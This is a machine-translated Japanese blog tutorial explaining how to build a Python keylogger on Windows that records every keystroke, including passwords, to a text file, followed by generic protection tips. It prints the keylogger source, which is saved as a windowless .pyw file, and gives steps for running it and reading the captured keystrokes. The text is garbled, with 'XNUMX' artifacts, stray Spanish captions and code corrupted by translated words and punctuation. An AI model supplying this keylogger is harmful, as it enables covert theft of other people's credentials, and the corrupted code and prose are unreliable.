Windowsでキーロガーを作成してパスワードを記録する方法

2022 年 1 月 8 日 マット・ミルズ 0

キーロガー ハッカーがパスワードを盗むために使用するツールの一種です。 これは、ネットワークに存在する多くの脅威のXNUMXつです。 ただし、その作成はまったく複雑ではありません。 必要な知識と一連のアプリケーションが必要です。 このようにして、キーをテストし、キーを壊す可能性のある実際の攻撃に備えることができます。 その方法を説明します。

キーロガーのしくみ

キーロガーを作成し、Windowsでパスワードを記録します

このタイプのマルウェアの使命は すべてのキーを登録します キーボードを押すこと。 このように、メールにログインするたびに、 Facebook または他のサービスの場合、プログラムは私たちが入れているものを記録し、アクセスコードとユーザー名を盗みます。

キーロガーは最も古いマルウェアツールのXNUMXつと言えます。 今日、アンチウイルスはそれらのほとんどを検出することができますが、真実は、ハッカーが彼らの技術を完成させ続け、コンピューターとモバイルデバイスの両方でより多くの犠牲者に到達することに成功しているということです。

それは通常です ファイルに隠されている インターネット経由でダウンロードしたり、インストールしたアプリケーションなど。 システムのバックグラウンドで実行され、動作していることを実際に知ることなく、すべてのキーストロークを記録します。 これは、後で攻撃者によって制御されているサーバーに送信される可能性があります。

このキーロガーは、 パスワードを記録する システムレベルで、コンピュータ自体に保存されます。 共有チームの場合、他の誰かがキーが何であるかを確認できます。

作成する手順

どうすればよいか説明します キーロガーをローカルで作成する 、パスワードをテストします。 リモートで作成する方が完全です。 私たちがやろうとしていることは、私たちのコンピューターのキーストロークを記録することです。 これは個人的な使用のためにのみ行う必要があり、自分のパスワードをテストし、その機器を使用する可能性のあるサードパーティに影響を与えないようにする必要があることに注意してください。

メモ帳を開く

私たちが最初にやらなければならないことは、 Windows メモ帳 またはプレーンテキストで記述できるその他のアプリケーション。 Pythonエディタ自体でも可能です。 作成したドキュメントに、次のコードを記述する必要があります。

</pre>
import pyHook, pythoncom, sys, logging
# feel free to set the file_log to a different file name/location

file_log = 'keyloggeroutput.txt'

def OnKeyboardEvent(イベント):
logging.basicConfig(filename = file_log、level = logging.DEBUG、format = '%(message)s')
chr(event.Ascii)
logging.log(10、chr(event.Ascii))
Trueを返す
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

これが完了したら、次に行うことはファイルをに保存することです pyw形式 。 たとえば、Keylogger.pywという名前を付けることができます。 これらの手順を実行するだけで、Pythonで記述されたキーロガーを使用できるようになります。 その瞬間から、私たちは私たちの機器のキーボード上のすべてのキーストロークを記録することができるようになります。 記録しようとしているこれらすべては、別のドキュメントに保存されます。

códigoキーロガーsencillo

Pythonをダウンロードしてインストールします

Python 動作させるにはインストールする必要があります。 Windowsにインストールされていない場合は、公式Webサイトにアクセスして、最新バージョンをダウンロードできます。 現在は3.10.1です。 また、PyHookとPywin32をスムーズに動作させるためにインストールする必要があります。

インストールして使用する準備ができたら、前に作成したファイルを実行するだけで済みます。 私たちは救う道に行かなければなりません キーロガー.pyw (または名前を付けたい場合は)ダブルクリックします。 その瞬間から、私たちが行ったキーストロークの記録が開始されます。

タスクマネージャーでのプロセス

正しく機能しているかどうかを確認したい場合は、 Windowsタスクマネージャ 。 これを行うには、Ctrl + Alt + Delのキーの組み合わせを押してそこで開く必要があります。 実行中のすべてのプロセスが表示され、この場合に関心のあるプロセスはpythow.exeです。

Finalizarキーロガープロセーソpython

終了する場合は、タスクマネージャーに移動し、プロセスをクリックして、[完了]をクリックするだけです。 キーボードで押されたキーの登録を自動的に停止し、.txt形式のテキストドキュメントを生成します。 これは、押されたすべてのものが表示される場所です。

パスワード付きのファイルを表示する

確認するには テキストファイル 登録されているすべてのキー(およびキーストローク)を使用して、ファイルが.pyw形式(Keylogger.pywまたは任意の名前)のディレクトリと、keyloggeroutputという名前のテキストファイルに移動する必要があります。 txtがそこに表示されます。

Pulsacionesregistradasキーロガー

開くと、上の画像に表示されているものと同様のものが表示されます。 登録されているキーを確認できます。 Windowsに入力したパスワードをテストし、リモートで制御できるより高度な攻撃を受けた場合にキーがどの程度盗まれる可能性があるかを確認できるのは簡単で理想的です。

保護するためのヒント

個人レベルで使用する簡単なキーロガーをコンピューターで作成する方法を確認した後、このタイプの攻撃の被害者にならないようにするためのヒントをいくつか紹介します。 私たちの アクセスコード 盗むことはできません。

セキュリティプログラム

まず、セキュリティプログラムを用意することです。 A 良いアンチウイルス ウイルスの侵入を防ぐために不可欠です。 たとえば、Windows Defender自体、Avast、Bitdefenderなどの名前を付けることができます。 多くのオプションがありますが、常に保証のXNUMXつを選択する必要があります。

ウイルス対策だけでなく、次のような他のアプリケーションも使用できます。 ファイアウォール またはブラウザのアドオンですら。 いずれの場合も、セキュリティを強化し、キーロガーやその他の脅威を盗むために使用される可能性のある危険な接続を回避するのに役立ちます。

すべてを更新します

時々 脆弱性はシステムに現れる 。 ブラウザなどの特定のアプリケーションに影響を与えるセキュリティ上の欠陥があります。 これにより、マルウェアが侵入し、プライバシーが侵害される可能性があります。 これを回避するには、最新バージョンを用意することが不可欠です。

セキュリティ パッチは、これらの問題を修正するために使用されます。 Windows、ブラウザ、および使用するすべてのプログラムを更新しておく必要があります。 ネットワークカードのドライバも最新である必要があるため、問題のリスクが軽減されます。

公式アプリを使用する

もちろん、私たちは常に使用する必要があります 公式プログラム 。 確かに、追加機能を備えたアプリケーションが存在する可能性があることもありますが、それらは公式ではないため、保証であるかどうか、またどのような影響を与える可能性があるかはわかりません。

ハッカーは、正当なふりをするプログラムを作成した可能性がありますが、実際には、情報を盗んだり、キーロガーを盗んだりするために使用されます。 これを回避するには、常に公式ストアからソフトウェアをダウンロードし、ページを保護する必要があります。

常識

もうXNUMXつのヒントは、常識を保つことです。 それは不可欠です 間違いをしないでください 、によって私たちに到達するファイルをダウンロードするなど email IDを確認したり、データを盗むためだけに作成された可能性のあるサードパーティのサイトを介してリンクを開いたりすることはありません。

ほとんどの攻撃は、ユーザーの操作によって発生します。 多くの場合、ファイルをダウンロードするか、以前に安全でないページからダウンロードしたプログラムをインストールする必要があるキーロガーですら。

要するに、私たちが見てきたように、個人的な使用のためのキーロガーを作成することは非常に簡単です。 ただし、攻撃者はより高度なパスワードを作成し、リモートでパスワードを盗むことができます。 保護され、日々の私たちに影響を与える可能性のある間違いを犯さないことが不可欠です。